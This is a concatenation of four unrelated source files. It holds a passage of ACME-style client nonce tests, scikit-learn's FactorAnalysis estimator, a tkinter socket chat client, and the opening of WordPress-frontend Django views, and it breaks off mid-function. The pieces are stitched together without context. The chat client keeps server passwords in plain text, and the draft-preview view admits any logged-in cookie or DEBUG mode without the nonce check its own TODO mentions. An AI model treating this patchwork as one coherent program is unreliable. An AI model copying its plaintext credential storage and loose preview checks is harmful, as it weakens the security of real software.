        self.assertEqual(self.response, self.net.head('url', 'foo', bar='baz'))
        self.send_request.assert_called_once_with(
            'HEAD', 'url', 'foo', bar='baz')

    def test_get(self):
        # get() runs the response through _check_response.
        self.assertEqual(self.checked_response, self.net.get(
            'url', content_type=self.content_type, bar='baz'))
        self.send_request.assert_called_once_with('GET', 'url', bar='baz')

    def test_post(self):
        # pylint: disable=protected-access
        self.assertEqual(self.checked_response, self.net.post(
            'uri', self.obj, content_type=self.content_type))
        self.net._wrap_in_jws.assert_called_once_with(
            self.obj, jose.b64decode(self.all_nonces.pop()))

        # Both nonces consumed: a further post must fail with MissingNonce.
        assert not self.available_nonces
        self.assertRaises(errors.MissingNonce, self.net.post,
                          'uri', self.obj, content_type=self.content_type)
        self.net._wrap_in_jws.assert_called_with(
            self.obj, jose.b64decode(self.all_nonces.pop()))

    def test_post_wrong_initial_nonce(self):  # HEAD
        # b'f' is not valid base64url, so the initial HEAD nonce is rejected.
        self.available_nonces = [b'f', jose.b64encode(b'good')]
        self.assertRaises(errors.BadNonce, self.net.post, 'uri',
                          self.obj, content_type=self.content_type)

    def test_post_wrong_post_response_nonce(self):
        # The nonce returned by the POST response itself is malformed.
        self.available_nonces = [jose.b64encode(b'good'), b'f']
        self.assertRaises(errors.BadNonce, self.net.post, 'uri',
                          self.obj, content_type=self.content_type)

    def test_head_get_post_error_passthrough(self):
        self.send_request.side_effect = requests.exceptions.RequestException
        for method in self.net.head, self.net.get:
            self.assertRaises(
                requests.exceptions.RequestException, method, 'GET', 'uri')
        self.assertRaises(requests.exceptions.RequestException,
                          self.net.post, 'uri', obj=self.obj)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()  # pragma: no cover
|
|
"""Factor Analysis.
A latent linear variable model.
FactorAnalysis is similar to probabilistic PCA implemented by PCA.score
While PCA assumes Gaussian noise with the same variance for each
feature, the FactorAnalysis model assumes different variances for
each of them.
This implementation is based on David Barber's Book,
Bayesian Reasoning and Machine Learning,
http://www.cs.ucl.ac.uk/staff/d.barber/brml,
Algorithm 21.1
"""
# Author: Christian Osendorfer <osendorf@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis A. Engemann <denis-alexander.engemann@inria.fr>
# License: BSD3
import warnings
from math import sqrt, log
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..externals.six.moves import xrange
from ..utils import check_array, check_random_state
from ..utils.extmath import fast_logdet, randomized_svd, squared_norm
from ..utils.validation import check_is_fitted
from ..exceptions import ConvergenceWarning
class FactorAnalysis(BaseEstimator, TransformerMixin):
    """Factor Analysis (FA)

    A simple linear generative model with Gaussian latent variables.

    The observations are assumed to be caused by a linear transformation of
    lower dimensional latent factors and added Gaussian noise.

    Without loss of generality the factors are distributed according to a
    Gaussian with zero mean and unit covariance. The noise is also zero mean
    and has an arbitrary diagonal covariance matrix.

    If we would restrict the model further, by assuming that the Gaussian
    noise is even isotropic (all diagonal entries are the same) we would obtain
    :class:`PPCA`.

    FactorAnalysis performs a maximum likelihood estimate of the so-called
    `loading` matrix, the transformation of the latent variables to the
    observed ones, using expectation-maximization (EM).

    Read more in the :ref:`User Guide <FA>`.

    Parameters
    ----------
    n_components : int | None
        Dimensionality of latent space, the number of components
        of ``X`` that are obtained after ``transform``.
        If None, n_components is set to the number of features.

    tol : float
        Stopping tolerance for EM algorithm.

    copy : bool
        Whether to make a copy of X. If ``False``, the input X gets overwritten
        during fitting.

    max_iter : int
        Maximum number of iterations.

    noise_variance_init : None | array, shape=(n_features,)
        The initial guess of the noise variance for each feature.
        If None, it defaults to np.ones(n_features)

    svd_method : {'lapack', 'randomized'}
        Which SVD method to use. If 'lapack' use standard SVD from
        scipy.linalg, if 'randomized' use fast ``randomized_svd`` function.
        Defaults to 'randomized'. For most applications 'randomized' will
        be sufficiently precise while providing significant speed gains.
        Accuracy can also be improved by setting higher values for
        `iterated_power`. If this is not sufficient, for maximum precision
        you should choose 'lapack'.

    iterated_power : int, optional
        Number of iterations for the power method. 3 by default. Only used
        if ``svd_method`` equals 'randomized'

    random_state : int, RandomState instance or None, optional (default=0)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`. Only used when ``svd_method`` equals 'randomized'.

    Attributes
    ----------
    components_ : array, [n_components, n_features]
        Components with maximum variance.

    loglike_ : list, [n_iterations]
        The log likelihood at each iteration.

    noise_variance_ : array, shape=(n_features,)
        The estimated noise variance for each feature.

    n_iter_ : int
        Number of iterations run.

    References
    ----------
    .. David Barber, Bayesian Reasoning and Machine Learning,
        Algorithm 21.1

    .. Christopher M. Bishop: Pattern Recognition and Machine Learning,
        Chapter 12.2.4

    See also
    --------
    PCA: Principal component analysis is also a latent linear variable model
        which however assumes equal noise variance for each feature.
        This extra assumption makes probabilistic PCA faster as it can be
        computed in closed form.
    FastICA: Independent component analysis, a latent variable model with
        non-Gaussian latent variables.
    """
    def __init__(self, n_components=None, tol=1e-2, copy=True, max_iter=1000,
                 noise_variance_init=None, svd_method='randomized',
                 iterated_power=3, random_state=0):
        self.n_components = n_components
        self.copy = copy
        self.tol = tol
        self.max_iter = max_iter
        # Eagerly reject unknown SVD methods so misconfiguration surfaces at
        # construction time rather than in the middle of fit().
        if svd_method not in ['lapack', 'randomized']:
            raise ValueError('SVD method %s is not supported. Please consider'
                             ' the documentation' % svd_method)
        self.svd_method = svd_method

        self.noise_variance_init = noise_variance_init
        self.iterated_power = iterated_power
        self.random_state = random_state

    def fit(self, X, y=None):
        """Fit the FactorAnalysis model to X using EM

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training data.

        Returns
        -------
        self
        """
        X = check_array(X, copy=self.copy, dtype=np.float64)

        n_samples, n_features = X.shape
        n_components = self.n_components
        if n_components is None:
            n_components = n_features
        self.mean_ = np.mean(X, axis=0)
        X -= self.mean_

        # some constant terms
        nsqrt = sqrt(n_samples)
        llconst = n_features * log(2. * np.pi) + n_components
        var = np.var(X, axis=0)

        if self.noise_variance_init is None:
            psi = np.ones(n_features, dtype=X.dtype)
        else:
            if len(self.noise_variance_init) != n_features:
                # Bug fix: the original message read "dimension does not with
                # number of features" -- the verb was missing.
                raise ValueError("noise_variance_init dimension does not "
                                 "match number of features : %d != %d" %
                                 (len(self.noise_variance_init), n_features))
            psi = np.array(self.noise_variance_init)

        loglike = []
        old_ll = -np.inf
        SMALL = 1e-12

        # we'll modify svd outputs to return unexplained variance
        # to allow for unified computation of loglikelihood
        if self.svd_method == 'lapack':
            def my_svd(X):
                _, s, V = linalg.svd(X, full_matrices=False)
                return (s[:n_components], V[:n_components],
                        squared_norm(s[n_components:]))
        elif self.svd_method == 'randomized':
            random_state = check_random_state(self.random_state)

            def my_svd(X):
                _, s, V = randomized_svd(X, n_components,
                                         random_state=random_state,
                                         n_iter=self.iterated_power)
                return s, V, squared_norm(X) - squared_norm(s)
        else:
            raise ValueError('SVD method %s is not supported. Please consider'
                             ' the documentation' % self.svd_method)

        for i in xrange(self.max_iter):
            # SMALL helps numerics
            sqrt_psi = np.sqrt(psi) + SMALL
            s, V, unexp_var = my_svd(X / (sqrt_psi * nsqrt))
            s **= 2
            # Use 'maximum' here to avoid sqrt problems.
            W = np.sqrt(np.maximum(s - 1., 0.))[:, np.newaxis] * V
            del V
            W *= sqrt_psi

            # loglikelihood
            ll = llconst + np.sum(np.log(s))
            ll += unexp_var + np.sum(np.log(psi))
            ll *= -n_samples / 2.
            loglike.append(ll)
            if (ll - old_ll) < self.tol:
                break
            old_ll = ll

            psi = np.maximum(var - np.sum(W ** 2, axis=0), SMALL)
        else:
            # for/else: only reached when the loop ran out of iterations
            # without hitting the tolerance break above.
            warnings.warn('FactorAnalysis did not converge.' +
                          ' You might want' +
                          ' to increase the number of iterations.',
                          ConvergenceWarning)

        self.components_ = W
        self.noise_variance_ = psi
        self.loglike_ = loglike
        self.n_iter_ = i + 1
        return self

    def transform(self, X):
        """Apply dimensionality reduction to X using the model.

        Compute the expected mean of the latent variables.
        See Barber, 21.2.33 (or Bishop, 12.66).

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training data.

        Returns
        -------
        X_new : array-like, shape (n_samples, n_components)
            The latent variables of X.
        """
        check_is_fitted(self, 'components_')

        X = check_array(X)
        Ih = np.eye(len(self.components_))

        X_transformed = X - self.mean_

        Wpsi = self.components_ / self.noise_variance_
        cov_z = linalg.inv(Ih + np.dot(Wpsi, self.components_.T))
        tmp = np.dot(X_transformed, Wpsi.T)
        X_transformed = np.dot(tmp, cov_z)

        return X_transformed

    def get_covariance(self):
        """Compute data covariance with the FactorAnalysis model.

        ``cov = components_.T * components_ + diag(noise_variance)``

        Returns
        -------
        cov : array, shape (n_features, n_features)
            Estimated covariance of data.
        """
        check_is_fitted(self, 'components_')

        cov = np.dot(self.components_.T, self.components_)
        cov.flat[::len(cov) + 1] += self.noise_variance_  # modify diag inplace
        return cov

    def get_precision(self):
        """Compute data precision matrix with the FactorAnalysis model.

        Returns
        -------
        precision : array, shape (n_features, n_features)
            Estimated precision of data.
        """
        check_is_fitted(self, 'components_')

        n_features = self.components_.shape[1]

        # handle corner cases first
        if self.n_components == 0:
            return np.diag(1. / self.noise_variance_)
        if self.n_components == n_features:
            return linalg.inv(self.get_covariance())

        # Get precision using matrix inversion lemma
        components_ = self.components_
        precision = np.dot(components_ / self.noise_variance_, components_.T)
        precision.flat[::len(precision) + 1] += 1.
        precision = np.dot(components_.T,
                           np.dot(linalg.inv(precision), components_))
        precision /= self.noise_variance_[:, np.newaxis]
        precision /= -self.noise_variance_[np.newaxis, :]
        precision.flat[::len(precision) + 1] += 1. / self.noise_variance_
        return precision

    def score_samples(self, X):
        """Compute the log-likelihood of each sample

        Parameters
        ----------
        X : array, shape (n_samples, n_features)
            The data

        Returns
        -------
        ll : array, shape (n_samples,)
            Log-likelihood of each sample under the current model
        """
        check_is_fitted(self, 'components_')

        Xr = X - self.mean_
        precision = self.get_precision()
        n_features = X.shape[1]
        log_like = np.zeros(X.shape[0])
        log_like = -.5 * (Xr * (np.dot(Xr, precision))).sum(axis=1)
        log_like -= .5 * (n_features * log(2. * np.pi)
                          - fast_logdet(precision))
        return log_like

    def score(self, X, y=None):
        """Compute the average log-likelihood of the samples

        Parameters
        ----------
        X : array, shape (n_samples, n_features)
            The data

        Returns
        -------
        ll : float
            Average log-likelihood of the samples under the current model
        """
        return np.mean(self.score_samples(X))
|
|
import socket,sqlite3,tkinter,time
from multiprocessing import Process, Queue
def add_nulls(dlen, data):
    """Left-pad *data* with '0' characters so it is at least *dlen* long."""
    # str.rjust pads only when the string is shorter than dlen and returns
    # the string unchanged otherwise -- same contract as the manual version.
    return data.rjust(dlen, "0")
class settings:
    """Persistence layer for app configuration and saved servers (conf.db)."""

    def __init__(self):
        # Create the schema on first use; IF NOT EXISTS makes this idempotent.
        connection = sqlite3.connect("conf.db")
        cur = connection.cursor()
        cur.execute('''
        CREATE TABLE IF NOT EXISTS config(
        NAME TEXT,
        VALUE TEXT)
        ''')
        cur.execute('''
        CREATE TABLE IF NOT EXISTS servers(
        ID INTEGER PRIMARY KEY,
        NAME TEXT,
        ADDR TEXT,
        PORT TEXT,
        LOGIN TEXT,
        PASSWORD TEXT)
        ''')
        connection.commit()
        connection.close()

    def get_setting(self, sname):
        """Return the (VALUE,) row for *sname*, or None when it is unset."""
        connection = sqlite3.connect("conf.db")
        cur = connection.cursor()
        cur.execute("SELECT VALUE FROM config WHERE NAME = ?", (sname,))
        result = cur.fetchone()
        connection.close()
        return result

    def set_setting(self, sname, value):
        """Store a NAME/VALUE pair in the config table."""
        connection = sqlite3.connect("conf.db")
        cur = connection.cursor()
        cur.execute("INSERT INTO config VALUES(?,?)", (sname, value))
        # Bug fix: the original closed the connection without committing,
        # so the INSERT was rolled back and the setting was never persisted.
        connection.commit()
        connection.close()

    def save_server(self, sname, addr, port, login, pwd):
        """Append a server entry (NULL id lets sqlite assign the primary key)."""
        connection = sqlite3.connect("conf.db")
        cur = connection.cursor()
        cur.execute("REPLACE INTO servers VALUES(NULL,?,?,?,?,?)",
                    (sname, addr, port, login, pwd))
        connection.commit()
        connection.close()

    def get_all_servers(self):
        """Return every saved server row: (ID, NAME, ADDR, PORT, LOGIN, PASSWORD)."""
        connection = sqlite3.connect("conf.db")
        cur = connection.cursor()
        cur.execute("SELECT * FROM servers")
        result = cur.fetchall()
        connection.close()
        return result
class history:
    """Per-server chat history stored in chats.db, one table per peer/server pair."""

    def make_tname(self, cID, sID):
        """Build the table name 'chat<cID:08><sID:08>' for a chat/server pair."""
        # rjust(8, "0") left-pads the numeric ids exactly like the module's
        # add_nulls() helper, while keeping this class self-contained.
        return "chat" + str(cID).rjust(8, "0") + str(sID).rjust(8, "0")

    def add_msg(self, cID, sID, sender, message):
        """Append (sender, message) to the chat table; sender 0 = local user."""
        tname = self.make_tname(cID, sID)
        connection = sqlite3.connect("chats.db")
        cur = connection.cursor()
        # Table names cannot be bound as SQL parameters; tname is built from
        # zero-padded integers only, so the interpolation is safe here.
        cur.execute('''
        CREATE TABLE IF NOT EXISTS ''' + tname + '''(
        SENDER INTEGER,
        MESSAGE BLOB)
        ''')
        connection.commit()
        cur.execute("INSERT INTO " + tname + " VALUES(?,?)", (sender, message))
        connection.commit()
        connection.close()

    def get_chat(self, cID, sID):
        """Return all (sender, message) rows for a chat, [] if none exist yet."""
        tname = self.make_tname(cID, sID)
        connection = sqlite3.connect("chats.db")
        cur = connection.cursor()
        try:
            cur.execute("SELECT * FROM " + tname)
            result = cur.fetchall()
        except sqlite3.OperationalError:
            # The table is only created on first message: no table == no chat.
            # (Narrowed from a bare except that swallowed every error.)
            result = []
        connection.close()
        return result

    def get_all_users(self, sID):
        """List the 8-digit user ids that have a chat table for server *sID*."""
        ssID = str(sID).rjust(8, "0")
        connection = sqlite3.connect("chats.db")
        cur = connection.cursor()
        cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
        usr = cur.fetchall()
        # Bug fix: the original returned without closing, leaking a
        # connection on every call.
        connection.close()
        usrs = []
        for i in usr:
            t = i[0]
            # Table layout is chatCCCCCCCCSSSSSSSS: match the server suffix,
            # collect the user-id segment.
            if t[12:] == ssID:
                usrs.append(t[4:12])
        return usrs
class connection:
    """Socket client for one chat server.

    Wire format (inferred from this file only -- TODO confirm against the
    server): ASCII-framed messages with a 3-letter command, zero-padded
    numeric fields, and a literal 'FIN' terminator.
    """

    def __init__(self, serv):
        # serv is a row from settings.get_all_servers():
        # (ID, NAME, ADDR, PORT, LOGIN, PASSWORD)
        self.addr = serv[2]
        self.port = int(serv[3])
        self.login = serv[4]
        self.pwd = serv[5]
        self.key = 0   # session key issued by the server after login
        self.ID = 0    # our numeric user id on this server

    def check_connection(self):
        # Perform a login and cache the credentials; 1 on success, 0 otherwise.
        key,ID = self.perform_login()
        self.key = key
        self.ID = ID
        if(key!=0 and ID!=0):
            return(1)
        else:
            return(0)

    def get_users(self):
        # Ask for the online-user list ('WOLFIN'); returns a list of 8-char
        # user ids, or [] on failure.
        msg = "WOLFIN".encode("utf-8")
        msglen = len(msg)
        t,sock = self.say_hello(msglen)
        if(t==1):
            sock.send(msg)
            answ = sock.recv(18).decode("utf-8")
            if(answ[:2]=="OK"):
                torec = int(answ[2:])
                answ = sock.recv(torec)
                answ = answ.decode("utf-8")
                to_ret = []
                # The payload is a concatenation of fixed-width 8-char ids.
                while(len(answ)>8):
                    to_ret.append(answ[:8])
                    answ = answ[8:]
                to_ret.append(answ)
                return(to_ret)
            else:
                # NOTE(review): indentation was lost in this source; this
                # else may originally have belonged to `if(t==1)` -- one of
                # the failure paths returns None. TODO confirm.
                return([])

    def check_key(self):
        # Debug helper: ask the server to validate the cached session key.
        sock = socket.socket()
        sock.connect((self.addr, self.port))
        msg = ("CHK"+str(self.key)).encode("utf-8")
        sock.send(msg)
        answ = sock.recv(6)
        print(answ)

    def say_hello(self,size):
        # Open a fresh socket and announce an upcoming message of *size*
        # bytes ('MES0001<size:04>'); returns (1, sock) if the server ACKs.
        sock = socket.socket()
        sock.connect((self.addr, self.port))
        msg = ("MES0001"+add_nulls(4,str(size))).encode("utf-8")
        sock.send(msg)
        answ = sock.recv(6)
        answ = answ.decode("utf-8")
        if(answ[:2]=="OK"):
            return(1,sock)
        else:
            return(0,sock)

    def perform_login(self):
        # 'LOG<llen:04><plen:04><login><password>FIN' -> 'OK<key:08><id>'.
        # Returns (key, ID), or (0, 0) on any failure.
        login = self.login.encode("utf-8")
        pwd = self.pwd.encode("utf-8")
        llen = add_nulls(4,str(len(login))).encode("utf-8")
        pwdlen = add_nulls(4,str(len(pwd))).encode("utf-8")
        msg = "LOG".encode("utf-8")+llen+pwdlen+login+pwd+"FIN".encode("utf-8")
        msglen = len(msg)
        t,sock = self.say_hello(msglen)
        if(t==1):
            sock.send(msg)
            answ = sock.recv(18)
            answ = answ.decode("utf-8")
            if(answ[:2]=="OK"):
                key = int(answ[2:10])
                ID = int(answ[10:])
                return(key,ID)
            else:
                return(0,0)
        else:
            return(0,0)

    def send_msg(self,msg,tid):
        # 'MSG<sender:08><key:08><target:08><text>FIN'; 1 if acknowledged.
        sidstr = add_nulls(8,str(self.ID))
        tidstr = add_nulls(8,str(tid))
        kkey = add_nulls(8,str(self.key))
        smsg = ("MSG"+sidstr+kkey+tidstr+msg+"FIN").encode("utf-8")
        msglen = len(smsg)
        t,sock = self.say_hello(msglen)
        if(t==1):
            sock.send(smsg)
            answ = sock.recv(18)
            answ = answ.decode("utf-8")
            if(answ[:2]=="OK"):
                return(1)
            else:
                return(0)
        else:
            return(0)

    def get_messages(self):
        # Poll pending messages ('UPD<key:08>FIN').
        # Returns a list of (sender_id, raw_bytes) on success,
        # -1 when the server replies non-OK, 0 on transport/parse errors.
        kkey = add_nulls(8,str(self.key))
        smsg = ("UPD"+kkey+"FIN").encode("utf-8")
        msglen = len(smsg)
        t,sock = self.say_hello(msglen)
        if(t==1):
            sock.send(smsg)
            answ = sock.recv(18)
            torec = 0
            try:
                answ=answ.decode("utf-8")
            except:
                return(0)
            if(answ[:2]=="OK"):
                try:
                    torec = int(answ[2:])
                except:
                    return(0)
                answ2 = sock.recv(torec)
                to_ret = []
                # Each record: <sender:08><len:04><payload of len bytes>.
                while(len(answ2)>4):
                    sender = int(answ2[:8].decode("utf-8"))
                    msglen = int(answ2[8:12].decode("utf-8"))
                    msg = answ2[12:12+msglen]
                    answ2 = answ2[12+msglen:]
                    to_ret.append((sender,msg))
                return(to_ret)
            else:
                return(-1)
        else:
            return(0)
class prog_windowed:
    """Tkinter GUI: server chooser, chat window and a 10-second polling loop."""

    def __init__(self):
        self.aID = 0      # tkinter `after` timer id for the polling loop
        self.curuid = 0   # currently selected peer id (0 = nobody)
        self.settings = settings()
        self.chathist = history()
        self.mw = tkinter.Tk()
        self.mw.geometry("800x600")
        servers = self.settings.get_all_servers()
        # First run (no servers saved yet) goes straight to the add dialog.
        if(servers==[]):
            self.make_serv_adding()
        else:
            self.show_serverlist()
        self.mw.mainloop()

    def make_serv_adding(self):
        # Close the server-list window if it is open; ignore when it never was.
        try:
            self.sl.destroy()
        except:
            pass
        self.sadd = tkinter.Toplevel()
        self.sadd.title("Add a server")
        self.sadd.geometry("300x300")
        self.l1 = tkinter.Label(self.sadd,text="Serv name")
        self.l1.pack()
        self.addname = tkinter.Entry(self.sadd)
        self.addname.pack()
        self.l2 = tkinter.Label(self.sadd,text="Serv addr")
        self.l2.pack()
        self.addaddr = tkinter.Entry(self.sadd)
        self.addaddr.pack()
        self.l3 = tkinter.Label(self.sadd,text="Serv port")
        self.l3.pack()
        self.addport = tkinter.Entry(self.sadd)
        self.addport.pack()
        self.l4 = tkinter.Label(self.sadd,text="Login")
        self.l4.pack()
        self.addlogin = tkinter.Entry(self.sadd)
        self.addlogin.pack()
        self.l5 = tkinter.Label(self.sadd,text="Password")
        self.l5.pack()
        # NOTE(review): the password Entry shows clear text; consider
        # show="*" -- TODO confirm intent.
        self.addpwd = tkinter.Entry(self.sadd)
        self.addpwd.pack()
        self.acceptbtn = tkinter.Button(self.sadd,text="Save",command = self.save_serv)
        self.acceptbtn.pack()

    def save_serv(self):
        # Persist the form fields and return to the server list.
        sname = self.addname.get()
        saddr = self.addaddr.get()
        sport = self.addport.get()
        slogin = self.addlogin.get()
        spassw = self.addpwd.get()
        self.settings.save_server(sname,saddr,sport,slogin,spassw)
        self.sadd.destroy()
        self.show_serverlist()

    def show_serverlist(self):
        self.sl = tkinter.Toplevel()
        self.sl.title("Choose a server to connect")
        self.sl.geometry("300x300")
        self.servs = self.settings.get_all_servers()
        self.l1 = tkinter.Label(self.sl,text = "Select a server from list")
        self.l1.pack()
        self.slist = tkinter.Listbox(self.sl)
        for i in self.servs:
            self.slist.insert(tkinter.END, i[1])
        self.slist.pack()
        self.cbtn = tkinter.Button(self.sl,text="Connect",command = self.connserv)
        self.cbtn.pack()
        self.abtn = tkinter.Button(self.sl,text="Add new server",command = self.make_serv_adding)
        self.abtn.pack()

    def connserv(self):
        # Listbox rows are inserted in self.servs order, so the selection
        # index maps directly onto the server row.
        self.current_server = self.servs[int(self.slist.curselection()[0])]
        self.sl.destroy()
        self.connection = connection(self.current_server)
        t = self.connection.check_connection()
        if(t==0):
            # Login failed: go back to the chooser.
            self.show_serverlist()
        else:
            self.make_ulist()
            self.make_chatwindow()

    def make_ulist(self):
        # Union of users with local history and currently-online users;
        # online ones get an "(online)" suffix in the display list.
        allusers = self.chathist.get_all_users(self.current_server[0])
        onlines = self.connection.get_users()
        ulist = allusers
        for i in onlines:
            if(i not in ulist):
                ulist.append(i)
        self.ulist = ulist
        self.writelist = []
        for i in ulist:
            if(i in onlines):
                self.writelist.append(i+"(online)")
            else:
                self.writelist.append(i)

    def make_chatwindow(self):
        self.texts = tkinter.Text(self.mw)
        self.texts.configure(width=60)
        self.texts.place(x=10,y=10)
        self.users = tkinter.Listbox(self.mw)
        self.users.configure(height = 23)
        self.users.place(x=600,y=10)
        for u in self.writelist:
            self.users.insert(tkinter.END,str(u))
        self.users.bind("<Double-Button-1>",self.change_chat)
        self.msgenter = tkinter.Entry(self.mw)
        self.msgenter.configure(width=80)
        self.msgenter.place(x=10,y=500)
        self.msgenter.bind("<Return>",self.sendmsg)
        self.l1 = tkinter.Label(self.mw,text="Message:")
        self.l1.place(x=10,y=470)
        self.sendbtn = tkinter.Button(self.mw,text="Send",command = self.sendmsg2)
        self.sendbtn.place(x=500,y=497)
        self.l2 = tkinter.Label(self.mw,text="Your ID is: "+str(self.connection.ID))
        self.l2.place(x=10,y=550)
        # NOTE(review): self.l2 is reassigned here, orphaning the label above.
        self.l2 = tkinter.Label(self.mw,text="Chat with: "+str(self.curuid))
        self.l2.place(x=10,y=400)
        # Kick off the polling loop almost immediately.
        self.aID = self.mw.after(100,self.check_chats)

    def change_chat(self,pressed):
        # Double-click handler on the user list; `pressed` is the tk event.
        uid = self.ulist[int(self.users.curselection()[0])]
        self.curuid = uid
        self.l2.configure(text="Chat with: "+str(self.curuid))
        self.check_chats()

    def sendmsg2(self):
        # Button callback adapter: sendmsg expects an (ignored) event arg.
        self.sendmsg(123)

    def sendmsg(self,shit):
        # Send the entry content to the selected peer; on success it is
        # recorded locally (sender 0 = us) and the entry is cleared.
        msg = self.msgenter.get()
        t = self.connection.send_msg(msg,self.curuid)
        if(t==1):
            self.chathist.add_msg(self.curuid,self.current_server[0],0,msg.encode("utf-8"))
            self.msgenter.delete("0",tkinter.END)
            self.check_chats()
        else:
            return

    def check_chats(self):
        # Poll the server, merge new messages into local history, and
        # re-render the transcript and user list. Reschedules itself.
        self.mw.after_cancel(self.aID)
        uid = self.curuid
        msgs = self.connection.get_messages()
        # get_messages returns a list on success, 0/-1 on failure.
        if(type(msgs) == type([])):
            for msg in msgs:
                self.chathist.add_msg(msg[0],self.current_server[0],1,msg[1])
        data = self.chathist.get_chat(self.curuid,self.current_server[0])
        to_write = []
        for msg in data:
            outmsg = ""
            if(msg[0]==0):
                outmsg+="You: "
            else:
                outmsg+=str(self.curuid)+": "
            # Message payloads are blobs; fall back for non-UTF-8 content.
            try:
                outmsg+=msg[1].decode("utf-8")
            except:
                outmsg+="blob data"
            to_write.append(outmsg)
        to_write.reverse()
        stw = "\n".join(to_write)
        check = self.texts.get("0.0",tkinter.END)
        self.make_ulist()
        self.users.delete('0',tkinter.END)
        for u in self.writelist:
            self.users.insert(tkinter.END,str(u))
        # Only rewrite the Text widget when content actually changed, to
        # avoid resetting the scroll position every poll.
        if(check.replace("\n","")!=stw.replace("\n","")):
            self.texts.delete('0.0',tkinter.END)
            self.texts.insert(tkinter.END,stw)
        self.aID = self.mw.after(10000,self.check_chats)
# Launches the GUI (blocking in mainloop) as soon as the module runs.
# NOTE(review): consider an `if __name__ == "__main__":` guard so that
# importing this module does not start the UI -- TODO confirm intent.
a = prog_windowed()
|
|
import os
from urllib import quote, unquote
from mimetypes import guess_type
from django.http import HttpResponse, Http404, HttpResponseBadRequest, HttpResponseRedirect, HttpResponsePermanentRedirect, HttpResponseServerError
from django.template import RequestContext, loader
from django.shortcuts import render_to_response, get_object_or_404
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.utils.translation import ugettext as _
from wp_frontman.blog import Blog
from wp_frontman.models import *
from wp_frontman.forms import CommentForm, UserCommentForm, LoginForm, RegistrationForm
from wp_frontman.feeds import *
from wp_frontman.cache import get_key, get_object_key, get_object_value, set_object_value
from wp_frontman.cache.view_decorators import wpf_cache_page
from wp_frontman.lib.utils import get_date_range, get_set, make_tree
from wp_frontman.lib.wp_password_hasher import hash_password
# Site-level configuration snapshot, read once at import time.
WPF_SENDFILE = Blog.site.use_sendfile
WPF_WP_ROOT = Blog.site.wp_root
WPF_CATEGORIES_AS_SETS = Blog.site.categories_as_sets
def page_to_limits(page, num):
    """Translate a 1-based page token into (page, start, end) slice bounds.

    *page* may be None, an int, or a string; anything that does not parse
    as an integer falls back to the first page.
    """
    try:
        page_num = int(page)
    except (TypeError, ValueError):
        # None (TypeError) or a non-numeric token (ValueError).
        return 1, 0, num
    start = (page_num - 1) * num
    return page_num, start, start + num
def simple_paginator_vars(page, has_next, pattern_name, kw=None):
    """Build the template context for previous/next pagination links.

    page -- current 1-based page number.
    has_next -- whether another page of results exists after this one.
    pattern_name -- URL pattern name passed to ``reverse()``.
    kw -- extra kwargs for ``reverse()``; a local dict is created when None
          (a 'page' key is added to it as needed).
    """
    kw = kw or dict()
    page_previous_url = page_next_url = None
    page_next = None
    page_previous = None if page == 1 else page - 1
    if page_previous == 1:
        # Page 1 links to the bare pattern URL, without a page kwarg.
        page_previous_url = reverse(pattern_name, kwargs=kw)
        if not page_previous_url.endswith('/'):
            # Bug fix: the original computed `page_previous_url + '/'` and
            # discarded the result, so the trailing slash was never appended.
            page_previous_url += '/'
    elif page_previous > 1:
        kw['page'] = page_previous
        page_previous_url = reverse(pattern_name, kwargs=kw)
    if has_next:
        kw['page'] = page_next = page + 1
        page_next_url = reverse(pattern_name, kwargs=kw)
    return dict(
        page=page, page_previous=page_previous, page_next=page_next,
        page_previous_url=page_previous_url, page_next_url=page_next_url
    )
@wpf_cache_page(timestamps=('__all__',))
def index(request, page=None):
    """Blog front page: latest published posts, draft preview, search redirect."""
    if request.GET.get('preview') and request.GET.get('p'):
        # find out if the user can access this preview
        user = User.user_from_cookie(request)
        # TODO: verify nonce and /or check user capabilities
        if user or settings.DEBUG:
            try:
                post = BasePost.objects.get(id=request.GET.get('p'), post_type='post', status='draft')
            except ObjectDoesNotExist:
                pass
            else:
                # Never cache a draft preview or it would leak publicly.
                request._cache_store_result = False
                return _post(request, post, None, 'wp_frontman/post.html')
    if 'q' in request.GET:
        # Legacy-style search: redirect to the canonical search URL.
        q = request.GET['q']
        if q is None or not q.strip():
            return HttpResponseRedirect(reverse('wpf_index'))
        return HttpResponseRedirect(reverse('wpf_search', kwargs=dict(q=q)))
    page, start, end = page_to_limits(page, request.blog.posts_per_page)
    # Fetch one extra row so we can tell whether a next page exists.
    posts = list(Post.objects.published().select_related('author')[start:end+1])
    if len(posts) > request.blog.posts_per_page:
        posts = posts[:-1]
        has_next = True
    else:
        has_next = False
    if posts:
        Post.fill_taxonomy_cache(posts)
    return render_to_response(
        'wp_frontman/index.html',
        dict(posts=posts, **simple_paginator_vars(page, has_next, 'wpf_index')),
        context_instance=RequestContext(request)
    )
@wpf_cache_page(timestamps=('post', 'comment'))  # don't care too much if the sidebar gets stale
def post(request, **kw):
    """Single post view, with authenticated revision previews and caching."""
    post = revision = None
    preview_id = request.GET.get('preview_id')
    if preview_id and request.GET.get('preview'):
        # checking the login first saves us a database request if we have no logged in user
        user_data = User.login_from_cookie(request)
        user = None if user_data is None else User.user_from_cookie(request, *user_data)
        if user:
            # NOTE(review): indentation was lost in this source; the else
            # below may instead pair with the verify_nonce if -- TODO confirm.
            if request.GET.get('preview_nonce'):
                if User.verify_nonce(request, request.GET['preview_nonce'], 'post_preview_%s' % preview_id):
                    # ok, we have a preview id
                    revision = preview_id
            else:
                revision = preview_id
    # check the cache
    if not revision:
        key = get_object_key(request.blog.blog_id, 'post', kw)
        post = get_object_value(request.blog.blog_id, key, ('post', 'comment_post'))
    if post is None:
        try:
            post = Post.objects.get_from_keywords(kw)
        except ObjectDoesNotExist:
            raise Http404("No such post.")
        except DuplicatePermalink, e:
            # Redirect to the canonical permalink carried by the exception.
            return HttpResponsePermanentRedirect(e.args[0])
        if post.status == 'future':
            # Scheduled posts are only visible to logged-in users and are
            # never cached.
            user = User.user_from_cookie(request)
            if not user:
                raise Http404("Not allowed")
            request._cache_store_result = False
